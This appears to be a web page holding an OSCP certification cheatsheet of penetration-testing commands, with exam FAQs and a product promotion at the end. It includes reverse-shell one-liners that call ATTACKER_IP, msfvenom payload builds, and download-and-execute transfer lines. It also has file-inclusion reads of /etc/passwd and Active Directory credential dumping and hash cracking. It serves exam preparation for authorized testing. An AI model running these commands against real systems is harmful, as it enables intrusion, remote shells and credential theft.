# Enumeration
Enumeration is everything in the OSCP. Spend 80% of your time here. Scan all ports, enumerate all services.
Nmap — Full Scan Strategy
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
Web Enumeration
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
whatweb http://TARGET && curl -s http://TARGET -I
nikto -h http://TARGET -C all
SMB Enumeration
smbclient -N -L //TARGET
enum4linux-ng -A TARGET
crackmapexec smb TARGET -u '' -p '' --shares
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
dig axfr @TARGET DOMAIN.LOCAL
# Web Exploitation
SQL injection, file upload bypass, command injection — the bread and butter of OSCP web boxes.
SQL Injection
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
File Upload Bypass
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Command Injection
; whoami
Local/Remote File Inclusion
curl "http://TARGET/page?file=../../../etc/passwd"
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
# Shells & Payloads
Reverse shells, bind shells, and payload generation — know these by heart for the exam.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && stty raw -echo; fg
Msfvenom Payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
# Linux Privilege Escalation
The OSCP loves Linux privesc. Check SUID, capabilities, cron jobs, writable paths, kernel version.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
find / -perm -4000 -type f 2>/dev/null
sudo -l
getcap -r / 2>/dev/null
cat /etc/crontab && ls -la /etc/cron*
find / -writable -type f 2>/dev/null | grep -v proc
uname -a && cat /etc/os-release
# Windows Privilege Escalation
Services, tokens, AlwaysInstallElevated, unquoted service paths, potatoes — the OSCP classics.
.\winPEASx64.exe
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
whoami /priv
.\GodPotato.exe -cmd "cmd /c whoami"
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
# Active Directory
AD is a major part of the OSCP after the 2023 update. Kerberoasting, AS-REP roasting, DCSync, and lateral movement.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET_IP -u USER -p PASS
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
# Pivoting & Tunneling
Reach internal networks through compromised hosts. Chisel, SSH tunnels, ligolo — must-know for OSCP.
Chisel (Recommended)
./chisel server -p 8080 --reverse
./chisel client ATTACKER_IP:8080 R:socks
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
SSH Tunneling
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
ssh -D 1080 user@PIVOT_IP
# Password Attacks
Cracking hashes, brute-forcing logins — hashcat and John are your best friends.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
# File Transfers
Get tools onto the target and exfil data back. Multiple methods for different situations.
Linux Targets
python3 -m http.server 8000
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
Windows Targets
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
# OSCP Exam Tips
Strategy and mindset for the 23h45 exam. These tips come from hundreds of OSCP experiences.
❓ OSCP Frequently Asked Questions
The OSCP exam is a 23h45 practical exam. It includes an Active Directory chain worth 40 points and 3 standalone machines worth 20 points each. You need 70 points to pass. A professional report submitted within 24 hours after the exam is mandatory.
Most common pentesting tools are allowed: nmap, Burp Suite, sqlmap, Metasploit (limited to one machine), linpeas, winpeas, crackmapexec, impacket, BloodHound. AI assistance is prohibited. Always check the official OffSec exam guide for the current policy.
Enumeration. The OSCP community consensus: if you're stuck, you haven't enumerated enough. Scan all 65535 TCP ports, check UDP, enumerate every service found, and read source code carefully. Spend 70-80% of your time on recon.
Most candidates need 3–6 months of dedicated practice on HackTheBox, TryHackMe, and OffSec PG Practice labs. Prior Linux administration and basic networking experience significantly reduces preparation time.
Kerberoasting is an Active Directory attack that requests service tickets for accounts with SPNs and cracks them offline. Use impacket-GetUserSPNs to extract hashes and hashcat -m 13100 with rockyou.txt to crack them.
Linux: sudo misconfigs, SUID binaries, cron job abuse, writable PATH entries. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated, DLL hijacking. Always run LinPEAS/WinPEAS first, then manually verify findings.
Yes, but only on one machine during the entire exam (including meterpreter and post modules). Choose wisely — save it for a machine where manual exploitation would be too time-consuming. The AD chain and buffer overflow machines are usually better candidates.
📚 Related Resources
- Nmap Cheatsheet — Complete nmap reference for recon and port scanning — essential for OSCP
- Full Pentesting Cheatsheet — 200+ commands for web, network, Active Directory, privesc and more
- How to Start Pentesting — OSCP methodology, learning path, and recommended labs
- Pentesting Glossary — Privilege escalation, lateral movement, Active Directory and 60+ terms defined
Turn your findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 11,600+ commands?
This cheatsheet is just the surface. Pentest Mindmap organizes 11,600+ commands in 33 categories with instant search and one-click copy.
Try free for 7 days →